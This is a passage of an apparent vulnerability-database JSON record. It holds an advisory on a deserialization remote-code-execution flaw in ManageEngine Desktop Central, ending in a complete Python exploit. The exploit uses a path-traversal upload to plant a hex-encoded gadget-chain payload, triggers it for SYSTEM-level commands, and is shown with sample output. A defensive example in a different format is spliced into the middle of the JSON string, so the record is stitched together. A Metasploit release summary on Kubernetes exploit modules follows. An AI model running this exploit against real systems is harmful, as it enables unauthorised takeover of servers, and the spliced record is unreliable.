"href": "https://srcincite.io/advisories/src-2020-0011/", "sourceData": "#!/usr/bin/env python3\n\"\"\"\nManageEngine Desktop Central FileStorage getChartImage Deserialization of Untrusted Data Remote Code Execution Vulnerability\n\nDownload: https://www.manageengine.com/products/desktop-central/download-free.html\nFile ...: ManageEngine_DesktopCentral_64bit.exe\nSHA1 ...: 73ab5bb00f993685c711c0aed450444795d5b826\nFound by: mr_me\nDate ...: 2019-12-12\nCVE ....: CVE-2020-10189\nClass ..: CWE-502\nCVSS ...: AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H (9.8 Critical)\nPatch ..: https://www.manageengine.com/products/desktop-central/remote-code-execution-vulnerability.html\n\n## Summary:\n\nAn unauthenticated attacker can reach a Deserialization of Untrusted Data vulnerability that can allow them to execute arbitrary code as SYSTEM/root.\n\n## Vulnerability Analysis:\n\nIn the web.xml file, we can see one of the default available servlets is the `CewolfServlet` servlet.\n\n```CewolfServletde.laures.cewolf.CewolfRendererdebugfalseoverliburl/js/overlib.jsstoragede.laures.cewolf.storage.FileStorage1...CewolfServlet/cewolf/*```\n\nThis servlet, contains the following code:\n\n```\n protected void doGet(HttpServletRequest request, HttpServletResponse response)\n throws ServletException, IOException {\n if (debugged) {\n logRequest(request);\n }\n addHeaders(response);\n if ((request.getParameter(\"state\") != null) || (!request.getParameterNames().hasMoreElements())) {\n requestState(response);\n return;\n }\n int width = 400;\n int height = 400;\n boolean removeAfterRendering = false;\n if (request.getParameter(\"removeAfterRendering\") != null) {\n removeAfterRendering = true;\n }\n if (request.getParameter(\"width\") != null) {\n width = Integer.parseInt(request.getParameter(\"width\"));\n }\n if (request.getParameter(\"height\") != null) {\n height = Integer.parseInt(request.getParameter(\"height\"));\n }\n if (!renderingEnabled) {\n renderNotEnabled(response, 400, 50);\n 
return;\n }\n if ((width > config.getMaxImageWidth()) || (height > config.getMaxImageHeight())) {\n renderImageTooLarge(response, 400, 50);\n return;\n }\n String imgKey = request.getParameter(\"img\"); // 1\n if (imgKey == null) {\n logAndRenderException(new ServletException(\"no 'img' parameter provided for Cewolf servlet.\"), response,\n width, height);\n return;\n }\n Storage storage = config.getStorage();\n ChartImage chartImage = storage.getChartImage(imgKey, request); // 2\n```\n\nAt [1] the code sets the `imgKey` variable using the GET parameter `img`. Later at [2], the code then calls the `storage.getChartImage` method with the attacker-supplied `img`. You may be wondering what class the `storage` instance is. This was mapped as an initializing parameter to the servlet code in the web.xml file:\n\n```storagede.laures.cewolf.storage.FileStorage```\n\n```\npublic class FileStorage implements Storage {\n static final long serialVersionUID = -6342203760851077577L;\n String basePath = null;\n List stored = new ArrayList();\n private boolean deleteOnExit = false;\n\n //...\n\n public void init(ServletContext servletContext) throws CewolfException {\n basePath = servletContext.getRealPath(\"/\");\n Configuration config = Configuration.getInstance(servletContext);\n deleteOnExit = \"true\".equalsIgnoreCase(\"\" + (String) config.getParameters().get(\"FileStorage.deleteOnExit\"));\n servletContext.log(\"FileStorage initialized, deleteOnExit=\" + deleteOnExit);\n }\n\n //...\n\n private String getFileName(String id) {\n return basePath + \"_chart\" + id; // 4\n }\n\n //...\n\n public ChartImage getChartImage(String id, HttpServletRequest request) {\n ChartImage res = null;\n ObjectInputStream ois = null;\n try {\n ois = new ObjectInputStream(new FileInputStream(getFileName(id))); // 3\n res = (ChartImage) ois.readObject(); // 5\n ois.close();\n } catch (Exception ex) {\n ex.printStackTrace();\n } finally {\n if (ois != null) {\n try {\n ois.close();\n } catch 
(IOException ioex) {\n ioex.printStackTrace();\n }\n }\n }\n return res;\n }\n```\n\nAt [3] the code calls `getFileName` using the attacker controlled `id` GET parameter which returns a path to a file on the filesystem using `basePath`. This field is set in the `init` method of the servlet. On the same line, the code creates a new `ObjectInputStream` instance from the supplied filepath via `FileInputStream`. This path is attacker controlled at [4], however, there is no need to (ab)use traversals here for exploitation.\n\nThe most important point is that at [5] the code calls `readObject` using the contents of the file without any further lookahead validation.\n\n## Exploitation:\n\nFor exploitation, an attacker can (ab)use the `MDMLogUploaderServlet` servlet to plant a file on the filesystem with controlled content inside. Here is the corresponding web.xml entry:\n\n```MDMLogUploaderServletcom.me.mdm.onpremise.webclient.log.MDMLogUploaderServlet...MDMLogUploaderServlet/mdm/mdmLogUploader/mdm/client/v1/mdmLogUploader```\n\n```\npublic class MDMLogUploaderServlet extends DeviceAuthenticatedRequestServlet {\n private Logger logger = Logger.getLogger(\"MDMLogger\");\n private Long customerID;\n private String deviceName;\n private String domainName;\n private Long resourceID;\n private Integer platformType;\n private Long acceptedLogSize = Long.valueOf(314572800L);\n\n public void doPost(HttpServletRequest request, HttpServletResponse response, DeviceRequest deviceRequest)\n throws ServletException, IOException {\n Reader reader = null;\n PrintWriter printWriter = null;\n\n logger.log(Level.WARNING, \"Received Log from agent\");\n\n Long nDataLength = Long.valueOf(request.getContentLength());\n\n logger.log(Level.WARNING, \"MDMLogUploaderServlet : file conentent lenght is {0}\", nDataLength);\n\n logger.log(Level.WARNING, \"MDMLogUploaderServlet :Acceptable file conentent lenght is {0}\", acceptedLogSize);\n try {\n if (nDataLength.longValue() <= 
acceptedLogSize.longValue()) {\n String udid = request.getParameter(\"udid\"); // 1\n String platform = request.getParameter(\"platform\");\n String fileName = request.getParameter(\"filename\"); // 2\n HashMap deviceMap = MDMUtil.getInstance().getDeviceDetailsFromUDID(udid);\n if (deviceMap != null) {\n customerID = ((Long) deviceMap.get(\"CUSTOMER_ID\"));\n deviceName = ((String) deviceMap.get(\"MANAGEDDEVICEEXTN.NAME\"));\n domainName = ((String) deviceMap.get(\"DOMAIN_NETBIOS_NAME\"));\n resourceID = ((Long) deviceMap.get(\"RESOURCE_ID\"));\n platformType = ((Integer) deviceMap.get(\"PLATFORM_TYPE\"));\n } else {\n customerID = Long.valueOf(0L);\n deviceName = \"default\";\n domainName = \"default\";\n }\n String baseDir = System.getProperty(\"server.home\");\n\n deviceName = removeInvalidCharactersInFileName(deviceName);\n\n String localDirToStore = baseDir + File.separator + \"mdm-logs\" + File.separator + customerID\n + File.separator + deviceName + \"_\" + udid; // 3\n\n File file = new File(localDirToStore);\n if (!file.exists()) {\n file.mkdirs(); // 4\n }\n logger.log(Level.WARNING, \"absolute Dir {0} \", new Object[]{localDirToStore});\n\n fileName = fileName.toLowerCase();\n if ((fileName != null) && (FileUploadUtil.hasVulnerabilityInFileName(fileName, \"log|txt|zip|7z\"))) { // 5\n logger.log(Level.WARNING, \"MDMLogUploaderServlet : Going to reject the file upload {0}\", fileName);\n response.sendError(403, \"Request Refused\");\n return;\n }\n String absoluteFileName = localDirToStore + File.separator + fileName; // 6\n\n logger.log(Level.WARNING, \"absolute File Name {0} \", new Object[]{fileName});\n\n InputStream in = null;\n FileOutputStream fout = null;\n try {\n in = request.getInputStream(); // 7\n fout = new FileOutputStream(absoluteFileName); // 8\n\n byte[] bytes = new byte['\u2710'];\n int i;\n while ((i = in.read(bytes)) != -1) {\n fout.write(bytes, 0, i); // 9\n }\n fout.flush();\n } catch (Exception e1) {\n e1.printStackTrace();\n } 
finally {\n if (fout != null) {\n fout.close();\n }\n if (in != null) {\n in.close();\n }\n }\n SupportFileCreation supportFileCreation = SupportFileCreation.getInstance();\n supportFileCreation.incrementMDMLogUploadCount();\n JSONObject deviceDetails = new JSONObject();\n deviceDetails.put(\"platformType\", platformType);\n deviceDetails.put(\"dataId\", resourceID);\n deviceDetails.put(\"dataValue\", deviceName);\n supportFileCreation.removeDeviceFromList(deviceDetails);\n } else {\n logger.log(Level.WARNING,\n \"MDMLogUploaderServlet : Going to reject the file upload as the file conentent lenght is {0}\",\n nDataLength);\n response.sendError(403, \"Request Refused\");\n return;\n }\n return;\n } catch (Exception e) {\n logger.log(Level.WARNING, \"Exception \", e);\n } finally {\n if (reader != null) {\n try {\n reader.close();\n } catch (Exception ex) {\n ex.fillInStackTrace();\n }\n }\n }\n }\n```\n\n```\n private static boolean isContainDirectoryTraversal(String fileName) {\n if ((fileName.contains(\"/\")) || (fileName.contains(\"\\\\\"))) {\n return true;\n }\n return false;\n }\n\n //...\n\n public static boolean hasVulnerabilityInFileName(String fileName, String allowedFileExt) {\n if ((isContainDirectoryTraversal(fileName)) || (isCompletePath(fileName))\n || (!isValidFileExtension(fileName, allowedFileExt))) {\n return true;\n }\n return false;\n }\n```\n\nWe can see that at [1] the `udid` variable is taken from the `udid` query-string parameter of a POST request. At [2] the `fileName` variable is taken from the `filename` query-string parameter. This `filename` parameter is actually filtered in two different ways for malicious values. At [3] a directory path is constructed using the `udid` from [1], with no traversal check of any kind, and at [4] `mkdirs` is called on that path. This is important because the `_chart` directory that `FileStorage.getFileName` reads from doesn't exist on the filesystem, and it has to exist before the deserialization bug can be exploited. 
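As an added example (not code from the advisory or from Zoho's product), the following Python mirrors the directory and file concatenation at [3] and [6] above and `FileStorage.getFileName` from the Cewolf listing, so you can see that a traversal in `udid` makes the uploaded file land exactly where `FileStorage` will later read it, and then shows what a look-ahead check in front of `readObject` at [5] would have seen in such a file, using the class descriptors of the gadget chain. The install root, the `udid` allow list, the benign class name and the `de.laures.cewolf.` prefix are assumptions, and the serialized samples are constructed headers, not a working payload.

```python
"""Added example: mirrors the two path constructions from the write-up and shows the
look-ahead class check that is missing in front of readObject. Not vendor code."""
import ntpath
import re
import struct

# Assumed install root and webapp root (hypothetical values; the real ones depend on the install).
SERVER_HOME = r'C:\Program Files\DesktopCentral_Server'
WEBAPP_ROOT = SERVER_HOME + r'\webapps\DesktopCentral' + '\\'   # getRealPath("/") keeps the trailing separator

def mdm_log_path(server_home, customer_id, device_name, udid, filename):
    """Mirror of [3] and [6] in MDMLogUploaderServlet: udid is concatenated into the
    directory with no traversal check, so it steers both mkdirs and the file write."""
    local_dir = ntpath.join(server_home, 'mdm-logs', str(customer_id), device_name + '_' + udid)
    return ntpath.normpath(ntpath.join(local_dir, filename))

def cewolf_chart_file(webapp_root, img):
    """Mirror of FileStorage.getFileName: basePath + "_chart" + id, with id = the img parameter."""
    return ntpath.normpath(webapp_root + '_chart' + img)

UDID_RE = re.compile(r'^[A-Za-z0-9-]{1,64}$')   # hypothetical allow list for udid

def safe_mdm_log_path(server_home, customer_id, device_name, udid, filename):
    """Hardened form: allow-list udid, then refuse any resolved path outside mdm-logs."""
    if not UDID_RE.match(udid):
        raise ValueError('udid rejected: %r' % udid)
    root = ntpath.normpath(ntpath.join(server_home, 'mdm-logs'))
    target = mdm_log_path(server_home, customer_id, device_name, udid, filename)
    if ntpath.commonpath([root, target]) != root:
        raise ValueError('path escapes mdm-logs: %r' % target)
    return target

# --- what a look-ahead check in front of readObject would see ---------------------
STREAM_MAGIC = b'\xac\xed\x00\x05'
TC_CLASSDESC = 0x72
SC_VALID = 0x1f   # WRITE_METHOD | SERIALIZABLE | EXTERNALIZABLE | BLOCK_DATA | ENUM
SC_TYPE = 0x16    # at least one of SERIALIZABLE, EXTERNALIZABLE, ENUM must be set
NAME_CHARS = re.compile(rb'^[A-Za-z0-9_$.;\[]+$')

def serialized_class_names(blob):
    """Heuristic walk of a java.io serialization stream. Each TC_CLASSDESC carries
    <u2 len><utf8 name><u8 serialVersionUID><u1 flags>; a candidate is kept only when
    the name looks like a class name and the flags byte that follows is well formed."""
    if not blob.startswith(STREAM_MAGIC):
        raise ValueError('not a Java serialization stream')
    names, pos = [], len(STREAM_MAGIC)
    while True:
        pos = blob.find(bytes([TC_CLASSDESC]), pos)
        if pos < 0 or pos + 3 > len(blob):
            break
        length = struct.unpack_from('>H', blob, pos + 1)[0]
        name = blob[pos + 3:pos + 3 + length]
        flags_at = pos + 3 + length + 8
        if 0 < length == len(name) and NAME_CHARS.match(name) and flags_at < len(blob):
            flags = blob[flags_at]
            if flags & ~SC_VALID == 0 and flags & SC_TYPE:
                names.append(name.decode('ascii'))
                pos = flags_at          # skip past the name and UID we just consumed
                continue
        pos += 1
    return names

def lookahead_check(blob, allowed_prefixes):
    """Returns the classes a look-ahead filter would reject before readObject runs."""
    allowed = tuple(allowed_prefixes)
    return [n for n in serialized_class_names(blob) if not n.startswith(allowed)]

def class_desc(name, serial_version_uid, flags):
    """TC_CLASSDESC header only (fields omitted), used to build the constructed samples."""
    return (bytes([TC_CLASSDESC]) + struct.pack('>H', len(name)) + name.encode('ascii')
            + struct.pack('>Q', serial_version_uid) + bytes([flags]))

# Constructed sample: the first three class descriptors of the gadget chain, with the
# serialVersionUIDs as they appear in the payload hex in this file. Not a working payload.
GADGET_SAMPLE = (STREAM_MAGIC + b'\x73'
                 + class_desc('java.util.PriorityQueue', 0x94da30b4fb3f82b1, 0x03) + b'\x00\x02'
                 + class_desc('org.apache.commons.beanutils.BeanComparator', 0xcf8e0182fe4ef17e, 0x02) + b'\x00\x02'
                 + class_desc('com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl', 0x09574fc16eacab33, 0x03) + b'\x00\x06')
# Constructed benign sample; the class name is hypothetical (Cewolf's real image class may differ).
BENIGN_SAMPLE = STREAM_MAGIC + b'\x73' + class_desc('de.laures.cewolf.storage.SerializableChartImage', 0x1234, 0x02) + b'\x00\x00'
CHART_ALLOW_LIST = ['de.laures.cewolf.']   # assumption: only Cewolf's own classes belong in _chart

if __name__ == '__main__':
    planted = mdm_log_path(SERVER_HOME, 0, 'default', r'si\..\..\..\webapps\DesktopCentral\_chart', 'logger.zip')
    print('upload lands at :', planted)
    print('cewolf reads    :', cewolf_chart_file(WEBAPP_ROOT, r'\logger.zip'))
    print('classes in blob :', serialized_class_names(GADGET_SAMPLE))
    print('would reject    :', lookahead_check(GADGET_SAMPLE, CHART_ALLOW_LIST))
```

`safe_mdm_log_path` is the shape of fix a reviewer would ask for on the upload side: reject `udid` values outside a strict allow list and, independently, refuse any resolved path that leaves `mdm-logs`. `lookahead_check` is a heuristic scanner rather than a JVM-side `ObjectInputFilter`, but it is enough to triage files found under `_chart` during an investigation: a stored chart image should never reference `TemplatesImpl` or `BeanComparator`.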
There is some validation on the `filename` at [5] which calls `FileUploadUtil.hasVulnerabilityInFileName` to check for directory traversals and an allow list of extensions.\n\nOf course, this doesn't stop `udid` from containing directory traversals, but I digress. At [6] the `absoluteFileName` variable is built up from the attacker influenced path at [3] using the filename from [2] and at [7] the binary input stream is read from the attacker controlled POST body. Finally at [8] and [9] the file is opened and the contents of the request is written to disk. What is not apparent however, is that further validation is performed on the `filename` at [2]. Let's take one more look at the web.xml file:\n\n```config-filesecurity-regex.xml,security-mdm-regex.xml,security-mdm-api-regex.xml,security-properties.xml,security-common.xml,security-admin-sec-settings.xml,security-fws.xml,security-api.xml,security-patch-restapi.xml,security-mdm-groupdevices.xml,security-mdm-admin.xml,security-mdm-general.xml,security-mdm-agent.xml,security-mdm-reports.xml,security-mdm-inventory.xml,security-mdm-appmgmt.xml,security-mdm-docmgmt.xml,security-mdm-configuration.xml,security-defaultresponseheaders.xml,security-mdm-remote.xml,security-mdm-api-json.xml,security-mdm-api-get.xml,security-mdm-api-post.xml,security-mdm-api-put.xml,security-mdm-api-delete.xml,security-mdm-privacy.xml,security-mdm-osmgmt.xml,security-mdmapi-appmgmt.xml,security-mdmapi-profilejson.xml,security-mdmapi-profilemgmt.xml,security-mdm-compliance.xml,security-mdm-geofence.xml,security-mdmapi-sdp.xml,security-mdmp-CEA.xml,security-mdmapi-supporttab.xml,security-mdmapi-general.xml,security-mdm-roles.xml,security-mdm-technicians.xml,security-mdm-cea.xml,security-mdmapi-content-mgmt.xml,security-config.xml,security-patch.xml,security-patch-apd-scan.xml,security-patch-apd-scan-views.xml,security-patch-deployment.xml,security-patch-views.xml,security-patch-config.xml,security-patch-onpremise.xml,security-patch-server.xml,securi
ty-onpremise-common.xml,security-mdm-onpremise-files.xml,security-mdmapi-directory.xml,security-admin.xml,security-onpremise-admin.xml,security-reports.xml,security-inventory.xml,security-custom-fields.xml```\n\nThe file that stands out is the `security-mdm-agent.xml` config file. The corresponding entry for the `MDMLogUploaderServlet` servlet restricts the `filename` GET parameter, via a regex pattern, to the strings \"logger.txt\", \"logger.zip\", \"mdmlogs.zip\" and \"managedprofile_mdmlogs.zip\". Note that the authentication attribute in that entry is ignored in this case. For exploitation, this limitation doesn't matter, since the deserialization bug permits a completely controlled filename through the `img` parameter.\n\n## Example:\n\nsaturn:~ mr_me$ ./poc.py \n(+) usage: ./poc.py\n(+) eg: ./poc.py 172.16.175.153 mspaint.exe\n\nsaturn:~ mr_me$ ./poc.py 172.16.175.153 \"cmd /c whoami > ../webapps/DesktopCentral/si.txt\"\n(+) planted our serialized payload\n(+) executed: cmd /c whoami > ../webapps/DesktopCentral/si.txt\n\nsaturn:~ mr_me$ curl http://172.16.175.153:8020/si.txt\nnt authority\\system\n\"\"\"\nimport os\nimport sys\nimport struct\nimport requests\nfrom requests.packages.urllib3.exceptions import InsecureRequestWarning\nrequests.packages.urllib3.disable_warnings(InsecureRequestWarning)\n\ndef _get_payload(c):\n p = \"aced0005737200176a6176612e7574696c2e5072696f72697479517565756594\"\n p += \"da30b4fb3f82b103000249000473697a654c000a636f6d70617261746f727400\"\n p += \"164c6a6176612f7574696c2f436f6d70617261746f723b787000000002737200\"\n p += \"2b6f72672e6170616368652e636f6d6d6f6e732e6265616e7574696c732e4265\"\n p += \"616e436f6d70617261746f72cf8e0182fe4ef17e0200024c000a636f6d706172\"\n p += \"61746f7271007e00014c000870726f70657274797400124c6a6176612f6c616e\"\n p += \"672f537472696e673b78707372003f6f72672e6170616368652e636f6d6d6f6e\"\n p += \"732e636f6c6c656374696f6e732e636f6d70617261746f72732e436f6d706172\"\n p += 
\"61626c65436f6d70617261746f72fbf49925b86eb13702000078707400106f75\"\n p += \"7470757450726f706572746965737704000000037372003a636f6d2e73756e2e\"\n p += \"6f72672e6170616368652e78616c616e2e696e7465726e616c2e78736c74632e\"\n p += \"747261782e54656d706c61746573496d706c09574fc16eacab3303000649000d\"\n p += \"5f696e64656e744e756d62657249000e5f7472616e736c6574496e6465785b00\"\n p += \"0a5f62797465636f6465737400035b5b425b00065f636c6173737400125b4c6a\"\n p += \"6176612f6c616e672f436c6173733b4c00055f6e616d6571007e00044c00115f\"\n p += \"6f757470757450726f706572746965737400164c6a6176612f7574696c2f5072\"\n p += \"6f706572746965733b787000000000ffffffff757200035b5b424bfd19156767\"\n p += \"db37020000787000000002757200025b42acf317f8060854e002000078700000\"\n p += \"069bcafebabe0000003200390a00030022070037070025070026010010736572\"\n p += \"69616c56657273696f6e5549440100014a01000d436f6e7374616e7456616c75\"\n p += \"6505ad2093f391ddef3e0100063c696e69743e010003282956010004436f6465\"\n p += \"01000f4c696e654e756d6265725461626c650100124c6f63616c566172696162\"\n p += \"6c655461626c6501000474686973010013537475625472616e736c6574506179\"\n p += \"6c6f616401000c496e6e6572436c61737365730100354c79736f73657269616c\"\n p += \"2f7061796c6f6164732f7574696c2f4761646765747324537475625472616e73\"\n p += \"6c65745061796c6f61643b0100097472616e73666f726d010072284c636f6d2f\"\n p += \"73756e2f6f72672f6170616368652f78616c616e2f696e7465726e616c2f7873\"\n p += \"6c74632f444f4d3b5b4c636f6d2f73756e2f6f72672f6170616368652f786d6c\"\n p += \"2f696e7465726e616c2f73657269616c697a65722f53657269616c697a617469\"\n p += \"6f6e48616e646c65723b2956010008646f63756d656e7401002d4c636f6d2f73\"\n p += \"756e2f6f72672f6170616368652f78616c616e2f696e7465726e616c2f78736c\"\n p += \"74632f444f4d3b01000868616e646c6572730100425b4c636f6d2f73756e2f6f\"\n p += \"72672f6170616368652f786d6c2f696e7465726e616c2f73657269616c697a65\"\n p += \"722f53657269616c697a6174696f6e48616e646c65723b01000a457863657074\"\n p += 
\"696f6e730700270100a6284c636f6d2f73756e2f6f72672f6170616368652f78\"\n p += \"616c616e2f696e7465726e616c2f78736c74632f444f4d3b4c636f6d2f73756e\"\n p += \"2f6f72672f6170616368652f786d6c2f696e7465726e616c2f64746d2f44544d\"\n p += \"417869734974657261746f723b4c636f6d2f73756e2f6f72672f617061636865\"\n p += \"2f786d6c2f696e7465726e616c2f73657269616c697a65722f53657269616c69\"\n p += \"7a6174696f6e48616e646c65723b29560100086974657261746f720100354c63\"\n p += \"6f6d2f73756e2f6f72672f6170616368652f786d6c2f696e7465726e616c2f64\"\n p += \"746d2f44544d417869734974657261746f723b01000768616e646c6572010041\"\n p += \"4c636f6d2f73756e2f6f72672f6170616368652f786d6c2f696e7465726e616c\"\n p += \"2f73657269616c697a65722f53657269616c697a6174696f6e48616e646c6572\"\n p += \"3b01000a536f7572636546696c6501000c476164676574732e6a6176610c000a\"\n p += \"000b07002801003379736f73657269616c2f7061796c6f6164732f7574696c2f\"\n p += \"4761646765747324537475625472616e736c65745061796c6f6164010040636f\"\n p += \"6d2f73756e2f6f72672f6170616368652f78616c616e2f696e7465726e616c2f\"\n p += \"78736c74632f72756e74696d652f41627374726163745472616e736c65740100\"\n p += \"146a6176612f696f2f53657269616c697a61626c65010039636f6d2f73756e2f\"\n p += \"6f72672f6170616368652f78616c616e2f696e7465726e616c2f78736c74632f\"\n p += \"5472616e736c6574457863657074696f6e01001f79736f73657269616c2f7061\"\n p += \"796c6f6164732f7574696c2f476164676574730100083c636c696e69743e0100\"\n p += \"116a6176612f6c616e672f52756e74696d6507002a01000a67657452756e7469\"\n p += \"6d6501001528294c6a6176612f6c616e672f52756e74696d653b0c002c002d0a\"\n p += \"002b002e01000708003001000465786563010027284c6a6176612f6c616e672f\"\n p += \"537472696e673b294c6a6176612f6c616e672f50726f636573733b0c00320033\"\n p += \"0a002b003401000d537461636b4d61705461626c6501001d79736f7365726961\"\n p += \"6c2f50776e6572373633323838353835323036303901001f4c79736f73657269\"\n p += \"616c2f50776e657237363332383835383532303630393b002100020003000100\"\n p += 
\"040001001a000500060001000700000002000800040001000a000b0001000c00\"\n p += \"00002f00010001000000052ab70001b100000002000d0000000600010000002e\"\n p += \"000e0000000c000100000005000f003800000001001300140002000c0000003f\"\n p += \"0000000300000001b100000002000d00000006000100000033000e0000002000\"\n p += \"0300000001000f00380000000000010015001600010000000100170018000200\"\n p += \"19000000040001001a00010013001b0002000c000000490000000400000001b1\"\n p += \"00000002000d00000006000100000037000e0000002a000400000001000f0038\"\n p += \"00000000000100150016000100000001001c001d000200000001001e001f0003\"\n p += \"0019000000040001001a00080029000b0001000c00000024000300020000000f\"\n p += \"a70003014cb8002f1231b6003557b10000000100360000000300010300020020\"\n p += \"00000002002100110000000a000100020023001000097571007e0010000001d4\"\n p += \"cafebabe00000032001b0a000300150700170700180700190100107365726961\"\n p += \"6c56657273696f6e5549440100014a01000d436f6e7374616e7456616c756505\"\n p += \"71e669ee3c6d47180100063c696e69743e010003282956010004436f64650100\"\n p += \"0f4c696e654e756d6265725461626c650100124c6f63616c5661726961626c65\"\n p += \"5461626c6501000474686973010003466f6f01000c496e6e6572436c61737365\"\n p += \"730100254c79736f73657269616c2f7061796c6f6164732f7574696c2f476164\"\n p += \"6765747324466f6f3b01000a536f7572636546696c6501000c47616467657473\"\n p += \"2e6a6176610c000a000b07001a01002379736f73657269616c2f7061796c6f61\"\n p += \"64732f7574696c2f4761646765747324466f6f0100106a6176612f6c616e672f\"\n p += \"4f626a6563740100146a6176612f696f2f53657269616c697a61626c6501001f\"\n p += \"79736f73657269616c2f7061796c6f6164732f7574696c2f4761646765747300\"\n p += \"2100020003000100040001001a00050006000100070000000200080001000100\"\n p += \"0a000b0001000c0000002f00010001000000052ab70001b100000002000d0000\"\n p += \"000600010000003b000e0000000c000100000005000f00120000000200130000\"\n p += \"0002001400110000000a000100020016001000097074000450776e7270770100\"\n p += \"7871007e000d78\"\n 
obj = bytearray(bytes.fromhex(p))\n obj[0x240:0x242] = struct.pack(\">H\", len(c) + 0x694)\n obj[0x6e5:0x6e7] = struct.pack(\">H\", len(c))\n start = obj[:0x6e7]\n end = obj[0x6e7:]\n return start + str.encode(c) + end\n\ndef we_can_plant_serialized(t, c):\n # stage 1 - traversal file write primitive\n uri = \"https://%s:8383/mdm/client/v1/mdmLogUploader\" % t\n p = {\n \"udid\" : \"si\\\\..\\\\..\\\\..\\\\webapps\\\\DesktopCentral\\\\_chart\",\n \"filename\" : \"logger.zip\"\n }\n h = { \"Content-Type\" : \"application/octet-stream\" }\n d = _get_payload(c)\n r = requests.post(uri, params=p, data=d, verify=False)\n if r.status_code == 200:\n return True\n return False\n\ndef we_can_execute_cmd(t):\n # stage 2 - deserialization\n uri = \"https://%s:8383/cewolf/\" % t\n p = { \"img\" : \"\\\\logger.zip\" }\n r = requests.get(uri, params=p, verify=False)\n if r.status_code == 200:\n return True\n return False\n\ndef main():\n if len(sys.argv) != 3:\n print(\"(+) usage: %s\" % sys.argv[0])\n print(\"(+) eg: %s 172.16.175.153 mspaint.exe\" % sys.argv[0])\n sys.exit(1)\n t = sys.argv[1]\n c = sys.argv[2]\n if we_can_plant_serialized(t, c):\n print(\"(+) planted our serialized payload\")\n if we_can_execute_cmd(t):\n print(\"(+) executed: %s\" % c)\n\nif __name__ == \"__main__\":\n main()", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://srcincite.io/pocs/src-2020-0011.py.txt"}], "rapid7blog": [{"lastseen": "2021-10-22T15:05:39", "description": "## We just couldn't contain ourselves!\n\n\n\nThis week we've got two Kubernetes modules coming at you from [adfoster-r7](<https://github.com/adfoster-r7>) and [smcintyre-r7](<https://github.com/smcintyre-r7>). First up is an enum module `auxiliary/cloud/kubernetes/enum_kubernetes` that'll extract a variety of information including the namespaces, pods, secrets, service token information, and the Kubernetes environment version! 
Next is an authenticated code execution module `exploit/multi/kubernetes/exec` (which shipped with a new websocket implementation, too, by the way) that will spin up a new pod with a Meterpreter payload for you provided you have the Kubernetes JWT token and access to the Kubernetes REST API. These modules can even be run through a compromised container that may be running on the Kubernetes cluster.\n\n## Atlassian Confluence WebWork OGNL Injection gets Windows support\n\nYou might remember [Confluence Server CVE-2021-26084](<https://attackerkb.com/topics/Eu74wdMbEL/cve-2021-26084-confluence-server-ognl-injection/rapid7-analysis?referrer=blog>) making an appearance in a wrap-up last month, and it's back! Rapid7\u2019s own [wvu-r7](<https://github.com/wvu-r7>) has updated his Confluence Server exploit to support Windows targets.\n\n## New module content (2)\n\n * [Kubernetes Enumeration](<https://github.com/rapid7/metasploit-framework/pull/15786>) by Spencer McIntyre and Alan Foster - This adds a module for enumerating Kubernetes environments. It can be run via an established session within a Kubernetes environment or with an authentication token and target information. It will extract a variety of information including the namespaces, pods, secrets and version.\n * [Kubernetes authenticated code execution](<https://github.com/rapid7/metasploit-framework/pull/15733>) by Spencer McIntyre and Alan Foster - Adds a new `exploit/multi/kubernetes/exec` module. It can be run via an established session within a Kubernetes environment or with an authentication token and target information. 
The module creates a new pod which will execute a Meterpreter payload to open a new session, as well as mounting the host's file system when possible.\n\n## Enhancements and features\n\n * [#15732](<https://github.com/rapid7/metasploit-framework/pull/15732>) from [dwelch-r7](<https://github.com/dwelch-r7>) \\- Adds terminal size synchronisation for fully interactive shells against Linux environments with `shell -it`. This functionality is behind a feature flag and can be enabled with `features set fully_interactive_shells true`.\n * [#15769](<https://github.com/rapid7/metasploit-framework/pull/15769>) from [wvu-r7](<https://github.com/wvu-r7>) \\- Added Windows support to the Atlassian Confluence CVE-2021-26084 exploit.\n * [#15773](<https://github.com/rapid7/metasploit-framework/pull/15773>) from [adfoster-r7](<https://github.com/adfoster-r7>) \\- Adds a collection of useful commands for configuring a local or remote Kubernetes environment to aid with testing and exploring Metasploit's Kubernetes modules and pivoting capabilities. 
The resource files include deploying two vulnerable applications, and populating secrets which can be extracted and stored as loot, as well as utility commands for creating admin and service account tokens.\n\n## Bugs fixed\n\n * [#15760](<https://github.com/rapid7/metasploit-framework/pull/15760>) from [adfoster-r7](<https://github.com/adfoster-r7>) \\- Fixes an issue when attempting to store JSON loot, where the extension was always being set to `bin` instead of `json`.\n\n## Get it\n\nAs always, you can update to the latest Metasploit Framework with `msfupdate` \nand you can get more details on the changes since the last blog post from \nGitHub:\n\n * [Pull Requests 6.1.10...6.1.11](<https://github.com/rapid7/metasploit-framework/pulls?q=is:pr+merged:%222021-10-13T09%3A47%3A12-05%3A00..2021-10-21T11%3A22%3A54-04%3A00%22>)\n * [Full diff 6.1.10...6.1.11](<https://github.com/rapid7/metasploit-framework/compare/6.1.10...6.1.11>)\n\nIf you are a `git` user, you can clone the [Metasploit Framework repo](<https://github.com/rapid7/metasploit-framework>) (master branch) for the latest. \nTo install fresh without using git, you can use the open-source-only [Nightly Installers](<https://github.com/rapid7/metasploit-framework/wiki/Nightly-Installers>) or the \n[binary installers](<https://www.rapid7.com/products/metasploit/download.jsp>) (which also include the commercial edition).", "cvss3": {}, "published": "2021-10-22T14:25:55", "type": "rapid7blog", "title": "Metasploit Wrap-Up", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2021-26084"], "modified": "2021-10-22T14:25:55", "id": "RAPID7BLOG:755102CA788DC2D430C6890A3E9B1040", "href": "https://blog.rapid7.com/2021/10/22/metasploit-wrap-up-135/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-09-07T15:01:26", "description": "\n\n_This attack is ongoing. 
